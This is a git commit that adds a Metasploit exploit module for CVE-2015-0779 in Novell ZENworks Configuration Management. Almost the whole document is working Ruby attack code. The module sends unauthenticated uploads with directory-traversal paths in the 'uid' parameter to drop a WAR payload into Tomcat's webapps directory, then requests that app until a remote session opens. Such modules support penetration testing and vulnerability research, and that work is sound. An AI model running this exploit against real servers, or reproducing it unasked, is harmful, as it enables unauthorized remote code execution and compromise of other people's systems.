Land #5096, @pedrib's exploit for Novell ZCM CVE-2015-0779

2015-05-01 14:35:28 -05:00 · 2015-05-01 14:35:28 -05:00 · a531ad9ec2
parent c3438955d4 0ff33572a7
commit a531ad9ec2
1 changed files with 132 additions and 0 deletions
--- a/modules/exploits/multi/http/zenworks_configuration_management_upload.rb
+++ b/modules/exploits/multi/http/zenworks_configuration_management_upload.rb
@ -0,0 +1,132 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'        => 'Novell ZENworks Configuration Management Arbitrary File Upload',
+      'Description' => %q{
+        This module exploits a file upload vulnerability in Novell ZENworks Configuration
+        Management (ZCM, which is part of the ZENworks Suite). The vulnerability exists in
+        the UploadServlet which accepts unauthenticated file uploads and does not check the
+        "uid" parameter for directory traversal characters. This allows an attacker to write
+        anywhere in the file system, and can be abused to deploy a WAR file in the Tomcat
+        webapps directory. ZCM up to (and including) 11.3.1 is vulnerable to this attack.
+        This module has been tested successfully with ZCM 11.3.1 on Windows and Linux. Note
+        that this is a similar vulnerability to ZDI-10-078 / OSVDB-63412 which also has a
+        Metasploit exploit, but it abuses a different parameter of the same servlet.
+      },
+      'Author'       =>
+        [
+          'Pedro Ribeiro <pedrib[at]gmail.com>', # Vulnerability Discovery and Metasploit module
+        ],
+      'License'     => MSF_LICENSE,
+      'References'  =>
+        [
+          ['CVE', '2015-0779'],
+          ['OSVDB', '120382'],
+          ['URL', 'https://raw.githubusercontent.com/pedrib/PoC/master/generic/zenworks_zcm_rce.txt'],
+          ['URL', 'http://seclists.org/fulldisclosure/2015/Apr/21']
+        ],
+      'DefaultOptions' => { 'WfsDelay' => 30 },
+      'Privileged'  => true,
+      'Platform'    => 'java',
+      'Arch'        => ARCH_JAVA,
+      'Targets'     =>
+        [
+          [ 'Novell ZCM < v11.3.2 - Universal Java', { } ]
+        ],
+      'DefaultTarget'  => 0,
+      'DisclosureDate' => 'Apr 7 2015'))
+
+    register_options(
+      [
+        Opt::RPORT(443),
+        OptBool.new('SSL',
+          [true, 'Use SSL', true]),
+        OptString.new('TARGETURI',
+          [true, 'The base path to ZCM / ZENworks Suite', '/zenworks/']),
+        OptString.new('TOMCAT_PATH',
+          [false, 'The Tomcat webapps traversal path (from the temp directory)'])
+      ], self.class)
+  end
+
+
+  def check
+    res = send_request_cgi({
+      'uri' => normalize_uri(datastore['TARGETURI'], 'UploadServlet'),
+      'method' => 'GET'
+    })
+
+    if res && res.code == 200 && res.body.to_s =~ /ZENworks File Upload Servlet/
+      return Exploit::CheckCode::Detected
+    end
+
+    Exploit::CheckCode::Safe
+  end
+
+
+  def upload_war_and_exec(tomcat_path)
+    app_base = rand_text_alphanumeric(4 + rand(32 - 4))
+    war_payload = payload.encoded_war({ :app_name => app_base }).to_s
+
+    print_status("#{peer} - Uploading WAR file to #{tomcat_path}")
+    res = send_request_cgi({
+      'uri' => normalize_uri(datastore['TARGETURI'], 'UploadServlet'),
+      'method' => 'POST',
+      'data' => war_payload,
+      'ctype' => 'application/octet-stream',
+      'vars_get' => {
+        'uid' => tomcat_path,
+        'filename' => "#{app_base}.war"
+      }
+    })
+    if res && res.code == 200
+      print_status("#{peer} - Upload appears to have been successful")
+    else
+      print_error("#{peer} - Failed to upload, try again with a different path?")
+      return false
+    end
+
+    10.times do
+      Rex.sleep(2)
+
+      # Now make a request to trigger the newly deployed war
+      print_status("#{peer} - Attempting to launch payload in deployed WAR...")
+      send_request_cgi({
+        'uri'    => normalize_uri(app_base, Rex::Text.rand_text_alpha(rand(8)+8)),
+        'method' => 'GET'
+      })
+
+      # Failure. The request timed out or the server went away.
+      break if res.nil?
+      # Failure. Unexpected answer
+      break if res.code != 200
+      # Unless session... keep looping
+      return true if session_created?
+    end
+
+    false
+  end
+
+
+  def exploit
+    tomcat_paths = []
+    if datastore['TOMCAT_PATH']
+      tomcat_paths << datastore['TOMCAT_PATH']
+    end
+    tomcat_paths.concat(['../../../opt/novell/zenworks/share/tomcat/webapps/', '../webapps/'])
+
+    tomcat_paths.each do |tomcat_path|
+      break if upload_war_and_exec(tomcat_path)
+    end
+  end
+end